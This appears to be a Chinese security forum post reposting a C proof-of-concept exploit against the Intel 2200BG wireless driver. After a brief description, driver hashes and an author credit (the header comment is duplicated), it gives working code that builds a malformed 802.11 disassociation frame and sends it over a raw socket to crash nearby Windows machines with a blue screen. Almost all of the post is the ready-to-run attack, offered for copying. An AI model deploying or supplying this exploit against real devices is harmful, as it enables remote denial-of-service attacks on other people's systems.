‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1117 小时 
注册时间
2007-10-23 
最后登录
2008-11-17 

资料收集奖 运营支持奖

楼主 发表于 2007-1-31 12:40  只看该作者

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

复制内容到剪贴板
代码:
/*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
/*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote  memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)

This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).

Driver files:

w29n51.sys    9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll   35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll    980f58b157baedc23026dd9302406bdd

Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)


Proof Of Concept:
*/

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// 28 bytes disassociation packet.

char d[] = { 0xa0, 0x00,   // 0xa0 pacote Disassociate  0xa000 FC Normal
        0x00, 0x00, // Duration ID
        0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
        0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
        0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
        0x00, 0x00, // Frag. Number
        0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code

int main() {
     struct sockaddr_ll link;
     struct ifreq iface;
     int s;
     char packet[sizeof(d)];
     int len = 0;

     if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
          return 0;

     bzero(&iface,sizeof(iface));
     bzero(&link,sizeof(link));
     bzero(packet,sizeof(d));

     strcpy(iface.ifr_name,"ath0raw");

     if(ioctl(s,SIOCGIFHWADDR, &iface)) {
          return 0;
     }

     if(ioctl(s,SIOCGIFINDEX, &iface)) {
          return -1;
     }

     if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
          return -1;
     }

     link.sll_family = AF_PACKET;
     link.sll_ifindex = iface.ifr_ifindex;

if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
          return -1;
     }

     memcpy(packet,d,sizeof(d));
     len = sendto(s,packet,sizeof(d), 0, NULL, 0);
     usleep(5000);
     printf("%d bytes enviados\n",len);

     close(s);

     return 0;
}

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题